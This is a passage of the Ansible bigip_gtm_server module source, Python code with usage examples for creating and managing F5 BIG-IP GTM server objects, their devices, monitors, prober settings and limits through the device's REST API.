- name: Create server "GTM_Server"
bigip_gtm_server:
server: lb.mydomain.com
user: admin
password: secret
name: GTM_Server
datacenter: /Common/New York
server_type: bigip
link_discovery: disabled
virtual_server_discovery: disabled
devices:
- {'name': 'server_1', 'address': '1.1.1.1'}
- {'name': 'server_2', 'address': '2.2.2.1', 'translation':'192.168.2.1'}
- {'name': 'server_2', 'address': '2.2.2.2'}
- {'name': 'server_3', 'addresses': [{'address':'3.3.3.1'},{'address':'3.3.3.2'}]}
- {'name': 'server_4', 'addresses': [{'address':'4.4.4.1','translation':'192.168.14.1'}, {'address':'4.4.4.2'}]}
delegate_to: localhost
- name: Create server "GTM_Server" with expanded keys
bigip_gtm_server:
server: lb.mydomain.com
user: admin
password: secret
name: GTM_Server
datacenter: /Common/New York
server_type: bigip
link_discovery: disabled
virtual_server_discovery: disabled
devices:
- name: server_1
address: 1.1.1.1
- name: server_2
address: 2.2.2.1
translation: 192.168.2.1
- name: server_2
address: 2.2.2.2
- name: server_3
addresses:
- address: 3.3.3.1
- address: 3.3.3.2
- name: server_4
addresses:
- address: 4.4.4.1
translation: 192.168.14.1
- address: 4.4.4.2
delegate_to: localhost
'''
RETURN = r'''
bits_enabled:
description: Whether the bits limit is enabled.
returned: changed
type: bool
sample: yes
bits_limit:
description: The new bits_enabled limit.
returned: changed
type: int
sample: 100
connections_enabled:
description: Whether the connections limit is enabled.
returned: changed
type: bool
sample: yes
connections_limit:
description: The new connections_limit limit.
returned: changed
type: int
sample: 100
monitors:
description: The new list of monitors for the resource.
returned: changed
type: list
sample: ['/Common/monitor1', '/Common/monitor2']
link_discovery:
description: The new C(link_discovery) configured on the remote device.
returned: changed
type: string
sample: enabled
virtual_server_discovery:
description: The new C(virtual_server_discovery) name for the trap destination.
returned: changed
type: string
sample: disabled
server_type:
description: The new type of the server.
returned: changed
type: string
sample: bigip
datacenter:
description: The new C(datacenter) which the server is part of.
returned: changed
type: string
sample: datacenter01
packets_enabled:
description: Whether the packets limit is enabled.
returned: changed
type: bool
sample: yes
packets_limit:
description: The new packets_limit limit.
returned: changed
type: int
sample: 100
'''
import re
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
from distutils.version import LooseVersion
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.common import is_empty_list
from library.module_utils.network.f5.icontrol import tmos_version
from library.module_utils.network.f5.icontrol import module_provisioned
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.common import is_empty_list
from ansible.module_utils.network.f5.icontrol import tmos_version
from ansible.module_utils.network.f5.icontrol import module_provisioned
try:
from collections import OrderedDict
except ImportError:
try:
from ordereddict import OrderedDict
except ImportError:
pass
class Parameters(AnsibleF5Parameters):
api_map = {
'product': 'server_type',
'virtualServerDiscovery': 'virtual_server_discovery',
'linkDiscovery': 'link_discovery',
'addresses': 'devices',
'iqAllowPath': 'iquery_allow_path',
'iqAllowServiceCheck': 'iquery_allow_service_check',
'iqAllowSnmp': 'iquery_allow_snmp',
'monitor': 'monitors',
'proberPreference': 'prober_preference',
'proberPool': 'prober_pool',
'proberFallback': 'prober_fallback',
'limitMaxBps': 'bits_limit',
'limitMaxBpsStatus': 'bits_enabled',
'limitMaxConnections': 'connections_limit',
'limitMaxConnectionsStatus': 'connections_enabled',
'limitMaxPps': 'packets_limit',
'limitMaxPpsStatus': 'packets_enabled',
'limitCpuUsage': 'cpu_limit',
'limitCpuUsageStatus': 'cpu_enabled',
'limitMemAvail': 'memory_limit',
'limitMemAvailStatus': 'memory_enabled',
}
api_attributes = [
'linkDiscovery',
'virtualServerDiscovery',
'product',
'addresses',
'datacenter',
'enabled',
'disabled',
'iqAllowPath',
'iqAllowServiceCheck',
'iqAllowSnmp',
'monitor',
'proberPreference',
'proberPool',
'proberFallback',
'limitMaxBps',
'limitMaxBpsStatus',
'limitMaxConnections',
'limitMaxConnectionsStatus',
'limitMaxPps',
'limitMaxPpsStatus',
'limitCpuUsage',
'limitCpuUsageStatus',
'limitMemAvail',
'limitMemAvailStatus',
]
updatables = [
'link_discovery',
'virtual_server_discovery',
'server_type_and_devices',
'datacenter',
'state',
'iquery_allow_path',
'iquery_allow_service_check',
'iquery_allow_snmp',
'monitors',
'prober_preference',
'prober_pool',
'prober_fallback',
'bits_enabled',
'bits_limit',
'connections_enabled',
'connections_limit',
'packets_enabled',
'packets_limit',
'cpu_enabled',
'cpu_limit',
'memory_enabled',
'memory_limit',
]
returnables = [
'link_discovery',
'virtual_server_discovery',
'server_type',
'datacenter',
'enabled',
'iquery_allow_path',
'iquery_allow_service_check',
'iquery_allow_snmp',
'devices',
'monitors',
'availability_requirements',
'prober_preference',
'prober_pool',
'prober_fallback',
'bits_enabled',
'bits_limit',
'connections_enabled',
'connections_limit',
'packets_enabled',
'packets_limit',
'cpu_enabled',
'cpu_limit',
'memory_enabled',
'memory_limit',
]
class ApiParameters(Parameters):
@property
def devices(self):
if self._values['devices'] is None:
return None
return self._values['devices']
@property
def server_type(self):
if self._values['server_type'] is None:
return None
elif self._values['server_type'] in ['single-bigip', 'redundant-bigip']:
return 'bigip'
else:
return self._values['server_type']
@property
def raw_server_type(self):
if self._values['server_type'] is None:
return None
return self._values['server_type']
@property
def enabled(self):
if self._values['enabled'] is None:
return None
return True
@property
def disabled(self):
if self._values['disabled'] is None:
return None
return True
@property
def iquery_allow_path(self):
if self._values['iquery_allow_path'] is None:
return None
elif self._values['iquery_allow_path'] == 'yes':
return True
return False
@property
def iquery_allow_service_check(self):
if self._values['iquery_allow_service_check'] is None:
return None
elif self._values['iquery_allow_service_check'] == 'yes':
return True
return False
@property
def iquery_allow_snmp(self):
if self._values['iquery_allow_snmp'] is None:
return None
elif self._values['iquery_allow_snmp'] == 'yes':
return True
return False
@property
def availability_requirement_type(self):
if self._values['monitors'] is None:
return None
if 'min ' in self._values['monitors']:
return 'at_least'
elif 'require ' in self._values['monitors']:
return 'require'
else:
return 'all'
@property
def monitors_list(self):
if self._values['monitors'] is None:
return []
try:
result = re.findall(r'/\w+/[^\s}]+', self._values['monitors'])
result.sort()
return result
except Exception:
return self._values['monitors']
@property
def monitors(self):
if self._values['monitors'] is None:
return None
if self._values['monitors'] == '/Common/bigip':
return '/Common/bigip'
monitors = [fq_name(self.partition, x) for x in self.monitors_list]
if self.availability_requirement_type == 'at_least':
monitors = ' '.join(monitors)
result = 'min {0} of {{ {1} }}'.format(self.at_least, monitors)
elif self.availability_requirement_type == 'require':
monitors = ' '.join(monitors)
result = 'require {0} from {1} {{ {2} }}'.format(self.number_of_probes, self.number_of_probers, monitors)
else:
result = ' and '.join(monitors).strip()
return result
@property
def number_of_probes(self):
"""Returns the probes value from the monitor string.
The monitor string for a Require monitor looks like this.
require 1 from 2 { /Common/tcp }
This method parses out the first of the numeric values. This values represents
the "probes" value that can be updated in the module.
Returns:
int: The probes value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'require\s+(?P<probes>\d+)\s+from'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return matches.group('probes')
@property
def number_of_probers(self):
"""Returns the probers value from the monitor string.
The monitor string for a Require monitor looks like this.
require 1 from 2 { /Common/tcp }
This method parses out the first of the numeric values. This values represents
the "probers" value that can be updated in the module.
Returns:
int: The probers value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'require\s+\d+\s+from\s+(?P<probers>\d+)\s+'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return matches.group('probers')
@property
def at_least(self):
"""Returns the 'at least' value from the monitor string.
The monitor string for a Require monitor looks like this.
min 1 of { /Common/gateway_icmp }
This method parses out the first of the numeric values. This values represents
the "at_least" value that can be updated in the module.
Returns:
int: The at_least value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'min\s+(?P<least>\d+)\s+of\s+'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return matches.group('least')
class ModuleParameters(Parameters):
def _get_limit_value(self, type):
if self._values['limits'] is None:
return None
if self._values['limits'][type] is None:
return None
return int(self._values['limits'][type])
def _get_limit_status(self, type):
if self._values['limits'] is None:
return None
if self._values['limits'][type] is None:
return None
if self._values['limits'][type]:
return 'enabled'
return 'disabled'
@property
def devices(self):
if self._values['devices'] is None:
return None
result = []
for device in self._values['devices']:
if not any(x for x in ['address', 'addresses'] if x in device):
raise F5ModuleError(
"The specified device list must contain an 'address' or 'addresses' key"
)
if 'address' in device:
translation = self._determine_translation(device)
name = device['address']
device_name = device['name']
result.append({
'name': name,
'deviceName': device_name,
'translation': translation
})
elif 'addresses' in device:
for address in device['addresses']:
translation = self._determine_translation(address)
name = address['address']
device_name = device['name']
result.append({
'name': name,
'deviceName': device_name,
'translation': translation
})
return result
@property
def enabled(self):
if self._values['state'] in ['present', 'enabled']:
return True
return False
@property
def datacenter(self):
if self._values['datacenter'] is None:
return None
return fq_name(self.partition, self._values['datacenter'])
def _determine_translation(self, device):
if 'translation' not in device:
return 'none'
return device['translation']
@property
def state(self):
if self._values['state'] == 'enabled':
return 'present'
return self._values['state']
@property
def iquery_allow_path(self):
if self._values['iquery_options'] is None:
return None
elif self._values['iquery_options']['allow_path'] is None:
return None
return self._values['iquery_options']['allow_path']
@property
def iquery_allow_service_check(self):
if self._values['iquery_options'] is None:
return None
elif self._values['iquery_options']['allow_service_check'] is None:
return None
return self._values['iquery_options']['allow_service_check']
@property
def iquery_allow_snmp(self):
if self._values['iquery_options'] is None:
return None
elif self._values['iquery_options']['allow_snmp'] is None:
return None
return self._values['iquery_options']['allow_snmp']
@property
def monitors_list(self):
if self._values['monitors'] is None:
return []
try:
result = re.findall(r'/\w+/[^\s}]+', self._values['monitors'])
result.sort()
return result
except Exception:
return self._values['monitors']
@property
def monitors(self):
if self._values['monitors'] is None:
return None
if is_empty_list(self._values['monitors']):
return '/Common/bigip'
monitors = [fq_name(self.partition, x) for x in self.monitors_list]
if self.availability_requirement_type == 'at_least':
if self.at_least > len(self.monitors_list):
raise F5ModuleError(
"The 'at_least' value must not exceed the number of 'monitors'."
)
monitors = ' '.join(monitors)
result = 'min {0} of {{ {1} }}'.format(self.at_least, monitors)
elif self.availability_requirement_type == 'require':
monitors = ' '.join(monitors)
if self.number_of_probes > self.number_of_probers:
raise F5ModuleError(
"The 'number_of_probes' must not exceed the 'number_of_probers'."
)
result = 'require {0} from {1} {{ {2} }}'.format(self.number_of_probes, self.number_of_probers, monitors)
else:
result = ' and '.join(monitors).strip()
return result
def _get_availability_value(self, type):
if self._values['availability_requirements'] is None:
return None
if self._values['availability_requirements'][type] is None:
return None
return int(self._values['availability_requirements'][type])
@property
def availability_requirement_type(self):
if self._values['availability_requirements'] is None:
return None
return self._values['availability_requirements']['type']
@property
def number_of_probes(self):
return self._get_availability_value('number_of_probes')
@property
def number_of_probers(self):
return self._get_availability_value('number_of_probers')
@property
def at_least(self):
return self._get_availability_value('at_least')
@property
def prober_pool(self):
if self._values['prober_pool'] is None:
return None
if self._values['prober_pool'] == '':
return self._values['prober_pool']
result = fq_name(self.partition, self._values['prober_pool'])
return result
@property
def prober_fallback(self):
if self._values['prober_fallback'] == 'any':
return 'any-available'
return self._values['prober_fallback']
@property
def bits_limit(self):
return self._get_limit_value('bits_limit')
@property
def packets_limit(self):
return self._get_limit_value('packets_limit')
@property
def connections_limit(self):
return self._get_limit_value('connections_limit')
@property
def cpu_limit(self):
return self._get_limit_value('cpu_limit')
@property
def memory_limit(self):
return self._get_limit_value('memory_limit')
@property
def bits_enabled(self):
return self._get_limit_status('bits_enabled')
@property
def packets_enabled(self):
return self._get_limit_status('packets_enabled')
@property
def connections_enabled(self):
return self._get_limit_status('connections_enabled')
@property
def cpu_enabled(self):
return self._get_limit_status('cpu_enabled')
@property
def memory_enabled(self):
return self._get_limit_status('memory_enabled')
class Changes(Parameters):
def to_return(self):
result = {}
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
return result
class UsableChanges(Changes):
@property
def monitors(self):
monitor_string = self._values['monitors']
if monitor_string is None:
return None
if '{' in monitor_string and '}':
tmp = monitor_string.strip('}').split('{')
monitor = ''.join(tmp).rstrip()
return monitor
return monitor_string
@property
def iquery_allow_path(self):
if self._values['iquery_allow_path'] is None:
return None
elif self._values['iquery_allow_path']:
return 'yes'
return 'no'
@property
def iquery_allow_service_check(self):
if self._values['iquery_allow_service_check'] is None:
return None
elif self._values['iquery_allow_service_check']:
return 'yes'
return 'no'
@property
def iquery_allow_snmp(self):
if self._values['iquery_allow_snmp'] is None:
return None
elif self._values['iquery_allow_snmp']:
return 'yes'
return 'no'
class ReportableChanges(Changes):
@property
def server_type(self):
if self._values['server_type'] in ['single-bigip', 'redundant-bigip']:
return 'bigip'
return self._values['server_type']
@property
def monitors(self):
if self._values['monitors'] is None:
return []
try:
result = re.findall(r'/\w+/[^\s}]+', self._values['monitors'])
result.sort()
return result
except Exception:
return self._values['monitors']
@property
def availability_requirement_type(self):
if self._values['monitors'] is None:
return None
if 'min ' in self._values['monitors']:
return 'at_least'
elif 'require ' in self._values['monitors']:
return 'require'
else:
return 'all'
@property
def number_of_probes(self):
"""Returns the probes value from the monitor string.
The monitor string for a Require monitor looks like this.
require 1 from 2 { /Common/tcp }
This method parses out the first of the numeric values. This values represents
the "probes" value that can be updated in the module.
Returns:
int: The probes value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'require\s+(?P<probes>\d+)\s+from'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return int(matches.group('probes'))
@property
def number_of_probers(self):
"""Returns the probers value from the monitor string.
The monitor string for a Require monitor looks like this.
require 1 from 2 { /Common/tcp }
This method parses out the first of the numeric values. This values represents
the "probers" value that can be updated in the module.
Returns:
int: The probers value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'require\s+\d+\s+from\s+(?P<probers>\d+)\s+'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return int(matches.group('probers'))
@property
def at_least(self):
"""Returns the 'at least' value from the monitor string.
The monitor string for a Require monitor looks like this.
min 1 of { /Common/gateway_icmp }
This method parses out the first of the numeric values. This values represents
the "at_least" value that can be updated in the module.
Returns:
int: The at_least value if found. None otherwise.
"""
if self._values['monitors'] is None:
return None
pattern = r'min\s+(?P<least>\d+)\s+of\s+'
matches = re.search(pattern, self._values['monitors'])
if matches is None:
return None
return int(matches.group('least'))
@property
def availability_requirements(self):
if self._values['monitors'] is None:
return None
result = dict()
result['type'] = self.availability_requirement_type
result['at_least'] = self.at_least
result['number_of_probers'] = self.number_of_probers
result['number_of_probes'] = self.number_of_probes
return result
@property
def prober_fallback(self):
if self._values['prober_fallback'] == 'any-available':
return 'any'
return self._values['prober_fallback']
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
want = getattr(self.want, param)
try:
have = getattr(self.have, param)
if want != have:
return want
except AttributeError:
return want
def _discovery_constraints(self):
if self.want.virtual_server_discovery is None:
virtual_server_discovery = self.have.virtual_server_discovery
else:
virtual_server_discovery = self.want.virtual_server_discovery
if self.want.link_discovery is None:
link_discovery = self.have.link_discovery
else:
link_discovery = self.want.link_discovery
if link_discovery in ['enabled', 'enabled-no-delete'] and virtual_server_discovery == 'disabled':
raise F5ModuleError(
"Virtual server discovery must be enabled if link discovery is enabled"
)
def _devices_changed(self):
if self.want.devices is None and self.want.server_type is None:
return None
if self.want.devices is None:
devices = self.have.devices
else:
devices = self.want.devices
if self.have.devices is None:
have_devices = []
else:
have_devices = self.have.devices
if len(devices) == 0:
raise F5ModuleError(
"A GTM server must have at least one device associated with it."
)
want = [OrderedDict(sorted(d.items())) for d in devices]
have = [OrderedDict(sorted(d.items())) for d in have_devices]
if want != have:
return True
return False
def _server_type_changed(self):
if self.want.server_type is None:
self.want.update({'server_type': self.have.server_type})
if self.want.server_type != self.have.server_type:
return True
return False
@property
def link_discovery(self):
self._discovery_constraints()
if self.want.link_discovery != self.have.link_discovery:
return self.want.link_discovery
@property
def virtual_server_discovery(self):
self._discovery_constraints()
if self.want.virtual_server_discovery != self.have.virtual_server_discovery:
return self.want.virtual_server_discovery
def _handle_current_server_type_and_devices(self, devices_change, server_change):
result = {}
if devices_change:
result['devices'] = self.want.devices
if server_change:
result['server_type'] = self.want.server_type
return result
def _handle_legacy_server_type_and_devices(self, devices_change, server_change):
result = {}
if server_change and devices_change:
result['devices'] = self.want.devices
if len(self.want.devices) > 1 and self.want.server_type == 'bigip':
if self.have.raw_server_type != 'redundant-bigip':
result['server_type'] = 'redundant-bigip'
elif self.want.server_type == 'bigip':
if self.have.raw_server_type != 'single-bigip':
result['server_type'] = 'single-bigip'
else:
result['server_type'] = self.want.server_type
elif devices_change:
result['devices'] = self.want.devices
if len(self.want.devices) > 1 and self.have.server_type == 'bigip':
if self.have.raw_server_type != 'redundant-bigip':
result['server_type'] = 'redundant-bigip'
elif self.have.server_type == 'bigip':
if self.have.raw_server_type != 'single-bigip':
result['server_type'] = 'single-bigip'
else:
result['server_type'] = self.want.server_type
elif server_change:
if len(self.have.devices) > 1 and self.want.server_type == 'bigip':
if self.have.raw_server_type != 'redundant-bigip':
result['server_type'] = 'redundant-bigip'
elif self.want.server_type == 'bigip':
if self.have.raw_server_type != 'single-bigip':
result['server_type'] = 'single-bigip'
else:
result['server_type'] = self.want.server_type
return result
@property
def server_type_and_devices(self):
"""Compares difference between server type and devices list
These two parameters are linked with each other and, therefore, must be
compared together to ensure that the correct setting is sent to BIG-IP
:return:
"""
devices_change = self._devices_changed()
server_change = self._server_type_changed()
if not devices_change and not server_change:
return None
tmos = tmos_version(self.client)
if LooseVersion(tmos) >= LooseVersion('13.0.0'):
result = self._handle_current_server_type_and_devices(
devices_change, server_change
)
return result
else:
result = self._handle_legacy_server_type_and_devices(
devices_change, server_change
)
return result
@property
def state(self):
if self.want.state == 'disabled' and self.have.enabled:
return dict(disabled=True)
elif self.want.state in ['present', 'enabled'] and self.have.disabled:
return dict(enabled=True)
@property
def monitors(self):
if self.want.monitors is None:
return None
if self.want.monitors == '/Common/bigip' and self.have.monitors == '/Common/bigip':
return None
if self.want.monitors == '/Common/bigip' and self.have.monitors is None:
return None
if self.want.monitors == '/Common/bigip' and len(self.have.monitors) > 0:
return '/Common/bigip'
if self.have.monitors is None:
return self.want.monitors
if self.have.monitors != self.want.monitors:
return self.want.monitors
@property
def prober_pool(self):
if self.want.prober_pool is None:
return None
if self.have.prober_pool is None:
if self.want.prober_pool == '':
return None
if self.want.prober_pool != self.have.prober_pool:
return self.want.prober_pool
@property
def prober_preference(self):
if self.want.prober_preference is None:
return None
if self.want.prober_preference == self.have.prober_preference:
return None
if self.want.prober_preference == 'pool' and self.want.prober_pool is None:
raise F5ModuleError(
"A prober_pool needs to be set if prober_preference is set to 'pool'"
)
if self.want.prober_preference != 'pool' and self.have.prober_preference == 'pool':
if self.want.prober_fallback != 'pool' and self.want.prober_pool != '':
raise F5ModuleError(
"To change prober_preference from {0} to {1}, set prober_pool to an empty string".format(
self.have.prober_preference,
self.want.prober_preference
)
)
if self.want.prober_preference == self.want.prober_fallback:
raise F5ModuleError(
"Prober_preference and prober_fallback must not be equal."
)
if self.want.prober_preference == self.have.prober_fallback:
raise F5ModuleError(
"Cannot set prober_preference to {0} if prober_fallback on device is set to {1}.".format(
self.want.prober_preference,
self.have.prober_fallback
)
)
if self.want.prober_preference != self.have.prober_preference:
return self.want.prober_preference
@property
def prober_fallback(self):
if self.want.prober_fallback is None:
return None
if self.want.prober_fallback == self.have.prober_fallback:
return None
if self.want.prober_fallback == 'pool' and self.want.prober_pool is None:
raise F5ModuleError(
"A prober_pool needs to be set if prober_fallback is set to 'pool'"
)
if self.want.prober_fallback != 'pool' and self.have.prober_fallback == 'pool':
if self.want.prober_preference != 'pool' and self.want.prober_pool != '':
raise F5ModuleError(
"To change prober_fallback from {0} to {1}, set prober_pool to an empty string".format(
self.have.prober_fallback,
self.want.prober_fallback
)
)
if self.want.prober_preference == self.want.prober_fallback:
raise F5ModuleError(
"Prober_preference and prober_fallback must not be equal."
)
if self.want.prober_fallback == self.have.prober_preference:
raise F5ModuleError(
"Cannot set prober_fallback to {0} if prober_preference on device is set to {1}.".format(
self.want.prober_fallback,
self.have.prober_preference
)
)
if self.want.prober_fallback != self.have.prober_fallback:
return self.want.prober_fallback
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.kwargs = kwargs
def exec_module(self):
if not module_provisioned(self.client, 'gtm'):
raise F5ModuleError(
"GTM must be provisioned to use this module."
)
if self.version_is_less_than('13.0.0'):
manager = self.get_manager('v1')
else:
manager = self.get_manager('v2')
return manager.exec_module()
def get_manager(self, type):
if type == 'v1':
return V1Manager(**self.kwargs)
elif type == 'v2':
return V2Manager(**self.kwargs)
def version_is_less_than(self, version):
tmos = tmos_version(self.client)
if LooseVersion(tmos) < LooseVersion(version):
return True
else:
return False
class BaseManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.want = ModuleParameters(params=self.module.params)
self.want.update(dict(client=self.client))
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
diff.client = self.client
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
if state in ['present', 'enabled', 'disabled']:
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def _check_link_discovery_requirements(self):
if self.want.link_discovery in ['enabled', 'enabled-no-delete'] and self.want.virtual_server_discovery == 'disabled':
raise F5ModuleError(
"Virtual server discovery must be enabled if link discovery is enabled"
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def create(self):
if self.want.state == 'disabled':
self.want.update({'disabled': True})
elif self.want.state in ['present', 'enabled']:
self.want.update({'enabled': True})
self.adjust_server_type_by_version()
self.should_update()
if self.want.devices is None:
raise F5ModuleError(
"You must provide an initial device."
)
self._assign_creation_defaults()
self.handle_prober_settings()
self._set_changed_options()
if self.module.check_mode:
return True
self.create_on_device()
if self.exists():
return True
else:
raise F5ModuleError("Failed to create the server")
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
uri = "https://{0}:{1}/mgmt/tm/gtm/server/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return response['selfLink']
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/gtm/server/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/gtm/server/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def absent(self):
changed = False
if self.exists():
changed = self.remove()
return changed
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the server")
return True
def remove_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/gtm/server/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
response = self.client.api.delete(uri)
if response.status == 200:
return True
raise F5ModuleError(response.content)
def exists(self):
uri = "https://{0}:{1}/mgmt/tm/gtm/server/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError:
return False
if resp.status == 404 or 'code' in response and response['code'] == 404:
return False
return True
class V1Manager(BaseManager):
def _assign_creation_defaults(self):
if self.want.server_type is None:
if len(self.want.devices) == 0:
raise F5ModuleError(
"You must provide at least one device."
)
elif len(self.want.devices) == 1:
self.want.update({'server_type': 'single-bigip'})
else:
self.want.update({'server_type': 'redundant-bigip'})
if self.want.link_discovery is None:
self.want.update({'link_discovery': 'disabled'})
if self.want.virtual_server_discovery is None:
self.want.update({'virtual_server_discovery': 'disabled'})
self._check_link_discovery_requirements()
def adjust_server_type_by_version(self):
if len(self.want.devices) == 1 and self.want.server_type == 'bigip':
self.want.update({'server_type': 'single-bigip'})
if len(self.want.devices) > 1 and self.want.server_type == 'bigip':
self.want.update({'server_type': 'redundant-bigip'})
def update(self):
self.have = self.read_current_from_device()
self.handle_prober_settings()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def handle_prober_settings(self):
if self.want.prober_preference is not None:
self.want._values.pop('prober_preference')
if self.want.prober_fallback is not None:
self.want._values.pop('prober_fallback')
class V2Manager(BaseManager):
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def _assign_creation_defaults(self):
if self.want.server_type is None:
self.want.update({'server_type': 'bigip'})
if self.want.link_discovery is None:
self.want.update({'link_discovery': 'disabled'})
if self.want.virtual_server_discovery is None:
self.want.update({'virtual_server_discovery': 'disabled'})
self._check_link_discovery_requirements()
def adjust_server_type_by_version(self):
pass
def handle_prober_settings(self):
if self.want.prober_preference == 'pool' and self.want.prober_pool is None:
raise F5ModuleError(
"A prober_pool needs to be set if prober_preference is set to 'pool'"
)
if self.want.prober_preference is not None and self.want.prober_fallback is not None:
if self.want.prober_preference == self.want.prober_fallback:
raise F5ModuleError(
"The parameters for prober_preference and prober_fallback must not be the same."
)
if self.want.prober_fallback == 'pool' and self.want.prober_pool is None:
raise F5ModuleError(
"A prober_pool needs to be set if prober_fallback is set to 'pool'"
)
class ArgumentSpec(object):
def __init__(self):
self.states = ['absent', 'present', 'enabled', 'disabled']
self.server_types = [
'alteon-ace-director',
'cisco-css',
'cisco-server-load-balancer',
'generic-host',
'radware-wsd',
'windows-nt-4.0',
'bigip',
'cisco-local-director-v2',
'extreme',
'generic-load-balancer',
'sun-solaris',
'cacheflow',
'cisco-local-director-v3',
'foundry-server-iron',
'netapp',
'windows-2000-server'
]
self.supports_check_mode = True
argument_spec = dict(
state=dict(
default='present',
choices=self.states,
),
name=dict(required=True),
server_type=dict(
choices=self.server_types,
aliases=['product']
),
datacenter=dict(),
link_discovery=dict(
choices=['enabled', 'disabled', 'enabled-no-delete']
),
virtual_server_discovery=dict(
choices=['enabled', 'disabled', 'enabled-no-delete']
),
devices=dict(
type='list'
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
),
iquery_options=dict(
type='dict',
options=dict(
allow_path=dict(type='bool'),
allow_service_check=dict(type='bool'),
allow_snmp=dict(type='bool')
)
),
availability_requirements=dict(
type='dict',
options=dict(
type=dict(
choices=['all', 'at_least', 'require'],
required=True
),
at_least=dict(type='int'),
number_of_probes=dict(type='int'),
number_of_probers=dict(type='int')
),
mutually_exclusive=[
['at_least', 'number_of_probes'],
['at_least', 'number_of_probers'],
],
required_if=[
['type', 'at_least', ['at_least']],
['type', 'require', ['number_of_probes', 'number_of_probers']]
]
),
limits=dict(
type='dict',
options=dict(
bits_enabled=dict(type='bool'),
packets_enabled=dict(type='bool'),
connections_enabled=dict(type='bool'),
cpu_enabled=dict(type='bool'),
memory_enabled=dict(type='bool'),
bits_limit=dict(type='int'),
packets_limit=dict(type='int'),
connections_limit=dict(type='int'),
cpu_limit=dict(type='int'),
memory_limit=dict(type='int'),
)
),
monitors=dict(type='list'),
prober_preference=dict(
choices=['inside-datacenter', 'outside-datacenter', 'inherit', 'pool']
),
prober_fallback=dict(
choices=['inside-datacenter', 'outside-datacenter',
